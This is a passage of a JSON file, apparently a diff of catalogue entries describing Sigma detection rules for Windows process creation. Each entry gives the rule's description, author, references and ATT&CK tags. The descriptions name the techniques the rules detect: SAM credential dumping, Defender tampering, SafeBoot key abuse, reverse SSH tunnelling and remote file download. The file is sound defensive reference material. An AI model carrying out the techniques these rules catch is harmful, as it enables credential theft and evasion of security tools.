the C:\\Users\\Public folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_public_folder_parent.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" - ], - "tags": "No established tags" - }, - "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "value": "Parent in Public Folder Suspicious Process" - }, - { - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/06/18", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_purplesharp_indicators.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/mvelazc0/PurpleSharp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" - ], - "tags": [ - "attack.t1587", - "attack.resource_development" - ] - }, - "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", - "value": "PurpleSharp Indicator" - }, - { - "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", - "meta": { - "author": "frack113", - "creation_date": "2022/01/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_pypykatz.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/skelsec/pypykatz", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "value": "Registry Parse with Pypykatz" - }, - { - "description": "Detects python spawning a pretty tty", - "meta": { - "author": "Nextron Systems", - "creation_date": "2022/06/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_python_pty_spawn.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", - "value": "Python Spawning Pretty TTY on Windows" - }, - { - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_quarks_pwdump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/quarkslab/quarkspwdump", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "0685b176-c816-4837-8e7b-1216f346636b", - "value": "Quarks PwDump Usage" - }, - { - "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_query_registry.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" - ] - }, - "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", - "value": "Query Registry" - }, - { - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_query_session_exfil.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "value": "Query Usage To Exfil Data" - }, - { - "description": "This command line patterns found in BlackByte Ransomware operations", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_ransom_blackbyte.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" - ], - "tags": "No established tags" - }, - "uuid": "999e8307-a775-4d5f-addc-4855632335be", - "value": "BlackByte Ransomware Patterns" - }, - { - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "value": "Raspberry Robin Dot Ending File" - }, - { - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/01/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_rdp_hijack_shadowing.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/kmkz_security/status/1220694202301976576", - "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1563.002" - ] - }, - "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "value": "MSTSC Shadowing" - }, - { - "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_redirect_local_admin_share.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" - ], - "tags": "No established tags" - }, - "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", - "value": "Suspicious Redirection to Local Admin Share" - }, - { - "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", - "meta": { - "author": "frack113", - "creation_date": "2022/02/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_redirect_to_stream.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", - "value": "Cmd Stream Redirection" - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "meta": { - "author": "Alexander Rausch", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_redmimicry_winnti_proc.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" - ] - }, - "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "value": "RedMimicry Winnti Playbook Execute" - }, - { - "description": "Detects the export of a crital Registry key to a file.", - "meta": { - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1012" - ] - }, - "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", - "value": "Exports Critical Registry Keys To a File" - }, - { - "description": "Detects the export of the target Registry key to a file.", - "meta": { - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Legitimate export of keys" - ], - "filename": "proc_creation_win_regedit_export_keys.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1012" - ] - }, - "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", - "value": "Exports Registry Key To a File" - }, - { - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "meta": { - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Legitimate import of keys", - "Evernote" - ], - "filename": "proc_creation_win_regedit_import_keys.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "value": "Imports Registry Key From a File" - }, - { - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "meta": { - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "value": "Imports Registry Key From an ADS" - }, - { - "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", - "meta": { - "author": "Eli Salem, Sander Wiebing, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate modification of keys" - ], - "filename": "proc_creation_win_regini.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", - "value": "Modifies the Registry From a File" - }, - { - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "meta": { - "author": "Eli Salem, Sander Wiebing, oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_regini_ads.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", - "value": "Modifies the Registry From a ADS" - }, - { - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/06/28", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" - ], - "filename": "proc_creation_win_reg_add_run_key.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", - "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", - "value": "Reg Add RUN Key" - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_reg_add_safeboot.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", - "value": "Add SafeBoot Keys Via Reg Utility" - }, - { - "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.", - "meta": { - "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_reg_defender_exclusion.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://redcanary.com/threat-detection-report/threats/qbot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", - "value": "Registry Defender Exclusions" - }, - { - "description": "Detects reg command lines that disable certain important features of Microsoft Defender", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/22", - "falsepositive": [ - "Rare legitimate use by administrators to test software (should always be investigated)" - ], - "filename": "proc_creation_win_reg_defender_tampering.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", - "value": "Registry Defender Tampering" - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "meta": { - "author": "Nasreddine Bencherchali, Tim Shelton", - "creation_date": "2022/08/08", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_reg_delete_safeboot.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", - "value": "Delete SafeBoot Keys Via Reg Utility" - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_reg_delete_services.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", - "value": "Delete Services Via Reg Utility" - }, - { - "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", - "meta": { - "author": "frack113", - "creation_date": "2022/01/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_reg_dump_sam.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", - "value": "Registry Dump of SAM Creds and Secrets" - }, - { - "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys", - "meta": { - "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", - "creation_date": "2022/02/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_reg_enable_rdp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" - ] - }, - "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", - "value": "Enabling RDP Service via Reg.exe" - }, - { - "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Legitimate import of keys" - ], - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ] - }, - "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", - "value": "Imports Registry Key From a File Using Reg.exe" - }, - { - "description": "Detects reg command lines that disables PPL on the LSA process", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/22", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_reg_lsass_ppl.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.010" - ] - }, - "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", - "value": "Registry Disabling LSASS PPL" - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.011" - ] - }, - "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", - "value": "Service ImagePath Change with Reg.exe" - }, - { - "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_remote_desktop_tunneling.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ] - }, - "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f", - "value": "Potential Remote Desktop Tunneling" - }, - { - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", - "value": "Remote File Download via Desktopimgdownldr Utility" - }, - { - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/09/12", - "falsepositive": [ - "Legitimate usage of remote Powershell, e.g. for monitoring purposes." - ], - "filename": "proc_creation_win_remote_powershell_session_process.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1021.006" - ] - }, - "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "value": "Remote PowerShell Session Host Process (WinRM)" - }, - { - "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate use of the system utilities to discover system time for legitimate reason" - ], - "filename": "proc_creation_win_remote_time_discovery.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1124" - ] - }, - "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", - "value": "Discovery of a System Time" - }, - { - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "meta": { - "author": "frack113", - "creation_date": "2021/07/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_remove_windows_defender_definition_files.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "value": "Remove Windows Defender Definition Files" - }, - { - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "meta": { - "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)", - "creation_date": "2019/06/15", - "falsepositive": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" - ], - "filename": "proc_creation_win_renamed_binary.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1036/", - "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", - "value": "Renamed Binary" - }, - { - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "meta": { - "author": "Matthew Green - @mgreen27, Florian Roth", - "creation_date": "2019/06/15", - "falsepositive": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" - ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1036/", - "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ] - }, - "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e", - "value": "Highly Relevant Renamed Binary" - }, - { - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/06/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_renamed_browsercore.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 